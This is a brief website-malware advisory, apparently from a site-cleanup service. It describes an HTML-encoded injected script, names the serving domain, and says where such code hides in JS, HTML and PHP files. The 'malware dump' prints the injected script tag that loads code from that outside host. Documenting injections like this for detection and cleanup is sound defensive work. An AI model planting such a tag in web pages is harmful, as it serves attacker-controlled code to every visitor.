Description:
A remote javascript was found on the site. It was also HTML encoded to make harder to identify where the malware was coming from.
Domains used in this attack:
http://howhigh.xz.lt/pub/counter.js
(and many others)Affecting:
Any web site sites (no specific target)
Clean up:
This malware is generally hidden inside the javascript files or at the bottom of the HTML or PHP files. Sign up here to get it clean up: Signup
Malware dump (sample of malware):
<script language="JavaScript" src="http://how
high.xz.lt/pub/counter.js"></script>